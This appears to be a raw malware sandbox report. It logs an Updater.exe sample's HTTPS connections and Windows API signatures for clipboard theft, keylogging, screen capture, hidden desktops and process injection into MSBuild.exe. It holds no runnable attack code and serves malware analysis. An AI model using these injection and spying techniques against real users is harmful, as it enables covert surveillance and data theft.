          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49766 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49777 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49793 version: TLS 1.2
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,35_2_00B9F664
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9F8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,35_2_00B9F8D3
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,35_2_00B9F664
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004359B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,36_2_004359B7
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8AA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,35_2_00B8AA95
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00BB9FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,35_2_00BB9FB4
          Source: Yara matchFile source: Process Memory Space: Updater.exe PID: 7592, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01406DB1 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,35_2_01406DB1
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_0140A239 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,35_2_0140A239
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8E3CB: CreateFileW,DeviceIoControl,CloseHandle,35_2_00B8E3CB
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,35_2_00B8230F
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8F76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,35_2_00B8F76E
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B2707035_2_00B27070
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B33AD935_2_00B33AD9
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B5E32F35_2_00B5E32F
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B424CA35_2_00B424CA
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B5659935_2_00B56599
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00BAC84435_2_00BAC844
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B429E335_2_00B429E3
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B4C9C035_2_00B4C9C0
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B3CBF035_2_00B3CBF0
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B56C0935_2_00B56C09
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B92D8135_2_00B92D81
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B2CE2035_2_00B2CE20
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B2EE0035_2_00B2EE00
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B42F2335_2_00B42F23
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B3F0DA35_2_00B3F0DA
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8916835_2_00B89168
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00BB525A35_2_00BB525A
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B3D37F35_2_00B3D37F
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B4774635_2_00B47746
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B4797535_2_00B47975
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B4196435_2_00B41964
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B47BD235_2_00B47BD2
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B2DC7035_2_00B2DC70
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B59D1E35_2_00B59D1E
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B41FC135_2_00B41FC1
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409B8A35_2_01409B8A
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409B9135_2_01409B91
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004100C536_2_004100C5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042509D36_2_0042509D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0041013036_2_00410130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0043A2E036_2_0043A2E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0041D5AF36_2_0041D5AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0044462036_2_00444620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042A6D036_2_0042A6D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042680036_2_00426800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040F97036_2_0040F970
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0043A97E36_2_0043A97E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042EB6036_2_0042EB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040100036_2_00401000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0041011836_2_00410118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004431D036_2_004431D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004331DE36_2_004331DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004291E036_2_004291E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004241E036_2_004241E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00442EB036_2_00442EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040F25036_2_0040F250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040B26036_2_0040B260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040A27036_2_0040A270
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0043E23036_2_0043E230
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004432C036_2_004432C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004012D536_2_004012D5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0041E29836_2_0041E298
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040132836_2_00401328
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042C3E036_2_0042C3E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0044238036_2_00442380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004433B036_2_004433B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042F4DD36_2_0042F4DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042949436_2_00429494
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004094BF36_2_004094BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0041F51036_2_0041F510
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004255A436_2_004255A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004335B036_2_004335B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042D64236_2_0042D642
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042762D36_2_0042762D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004386FE36_2_004386FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004226A036_2_004226A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042762D36_2_0042762D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040D76036_2_0040D760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0044172036_2_00441720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0044372036_2_00443720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040A73036_2_0040A730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042949436_2_00429494
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042B7D936_2_0042B7D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042B7FE36_2_0042B7FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0044285036_2_00442850
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0041482A36_2_0041482A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_004038E036_2_004038E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0043994036_2_00439940
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040796036_2_00407960
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0044492036_2_00444920
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0043198036_2_00431980
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042AA4036_2_0042AA40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042CA7236_2_0042CA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00420A2436_2_00420A24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00421B4036_2_00421B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040DB2036_2_0040DB20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00415BD836_2_00415BD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00439BA036_2_00439BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00414BBF36_2_00414BBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00444C5036_2_00444C50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00434C6036_2_00434C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042AC0436_2_0042AC04
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0043EC2036_2_0043EC20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040ECC036_2_0040ECC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00427CD236_2_00427CD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0041ECDE36_2_0041ECDE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040BD7036_2_0040BD70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00429D0036_2_00429D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0040ADD036_2_0040ADD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00432D8036_2_00432D80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00408DA036_2_00408DA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00422E5036_2_00422E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00416E1036_2_00416E10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0042BE1036_2_0042BE10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00442EB036_2_00442EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00406F6036_2_00406F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00428F0036_2_00428F00
